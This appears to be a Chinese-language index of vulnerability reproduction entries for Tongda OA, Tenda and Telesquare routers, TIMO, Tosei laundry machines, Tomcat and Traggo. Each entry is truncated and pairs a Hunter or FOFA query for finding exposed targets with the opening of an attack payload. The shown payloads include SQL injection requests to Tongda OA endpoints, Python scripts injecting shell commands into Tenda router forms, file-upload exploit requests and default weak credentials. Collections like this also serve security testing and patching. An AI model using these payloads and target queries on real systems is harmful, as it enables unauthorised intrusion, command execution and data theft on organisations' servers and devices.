T10-12通达-OA-文件上传 漏洞描述: action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞。 网站图片: 网络测绘: Hunter 语法: app.name=“通达 OA” 漏洞复现: POST /module/ueditor/php/action_uploa
T10-10通达-OA-文件上传 漏洞描述: 通达OA api.ali.php存在任意文件上传漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限。 网站图片: 网络测绘: Hunter 语法: app.name=“通达 OA” 漏洞复现: 发起get请求写入文件,其中2309代表着其创建日期,
T10-9通达-OA-文件上传 漏洞描述: 通达OA /general/vmeet/wbUpload.php存在任意文件上传漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限。 网站图片: 网络测绘: Hunter 语法: app.name=“通达 OA” 漏洞复现: payload: POS
T10-8通达-OA-SQL 漏洞描述: 网站图片: 网络测绘: Hunter 语法: app.name=“通达 OA” 漏洞复现: payload: GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%2
T10-7通达-OA-SQL 漏洞描述: 网站图片: 网络测绘: Hunter 语法: app.name=“通达 OA” 漏洞复现: payload: GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%
T10-6通达-OA-SQL 漏洞描述: 通达OA report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。 网站图片: 网络测绘: Hunter 语法: app.name=“通达 OA” 漏洞复现: payload: POST /general/bi_desig
T10-5通达-OA-SQL 漏洞描述: 通达OA /general/score/flow/scoredate/result.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。 网站图片: 网络测绘: Hunter 语法: app.name=“通达 OA” 漏洞复现: payload:
T10-4通达-OA-SQL 漏洞描述: 通达OA /interface/auth.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。 网站图片: 网络测绘: Hunter 语法: app.name=“通达 OA” 漏洞复现: payload: http://192.168.31.164
T10-3通达-OA-SQL 漏洞描述: 通达OA /share/handle.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。 网站图片: 网络测绘: Hunter 语法: app.name=“通达 OA” 漏洞复现: payload: http://192.168.31.164/s
T10-2通达-OA-SQL 漏洞描述: 通达OA /general/appbuilder/web/report/repdetail/edit 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。 网站图片: 网络测绘: Hunter 语法: app.name=“通达 OA” 漏洞复现: 利用条件
T10-1通达-OA-SQL 漏洞描述: 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据
T9-1Telesquare-TLR-2005Ksh路由器-RCE 漏洞描述: Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。 影响版本: 1.0.0 < vers
T8-3Tenda-路由器-SQL 漏洞复现: payload: import requests ip = '192.168.74.145' url = f"http://{ip}/goform/exeCommand" data = "cmdinput=ls;" ret = requests
T8-2Tenda-路由器-RCE 漏洞复现: payload: import requests ip = '192.168.74.145' url = "http://" + ip + "/goform/WriteFacMac" payload = ";echo 'hacker!'"
T8-1Tenda-路由器-RCE 漏洞描述: 腾达路由器后台 uploadWewifiPic 路由存在命令执行漏洞,攻击者可利用漏洞执行任意命令获取服务器权限。 网站图片: 网络测绘: fofa语法: FOFA:app=“Tenda-路由器” 漏洞复现: 默认弱口令登录 账号:admin 密码:g
T7-1TIMO-后台管理系统-反序列化RCE 漏洞描述: TIMO 后台管理系统2.0及之前版本存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。 网站
T6-1Tosei-自助洗衣机-RCE 漏洞描述: Tosei 自助洗衣机 web 管理端存在安全漏洞,攻击者利用该漏洞可以通过 network_test.php 的命令执行,在服务器任意执行代码,获取服务器权限,进而控制整个服务器。 网站图片: 网络测绘: fofa语法: FOFA:body=“t
T5-3Tomcat–InformationLeakage 漏洞复现: payload: POST / HTTP/1.1 Host: hostname Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24" Sec-Ch-Ua-Mobile: ?0 S
T5-1Tomcat-RCE 漏洞描述: tomcat启用manager(后台管理)功能,且存在弱口令 漏洞复现: 在 conf/tomcat-users.xml 文件中配置用户的权限和一个弱口令 tomcat/tomcat: payload: <tomcat-users> <role role
T4-1TraggoServer-任意文件读取 漏洞描述: Traggo Server是一个基于标签的时间跟踪工具。在Traggo中,没有任务,只有标记的时间跨度。可以用来跟踪、分析每天时间用在哪些地方,方便更好的管理时间,提高效率。Traggo存在任意文件读取漏洞。 网站图片: 网络测绘: Hun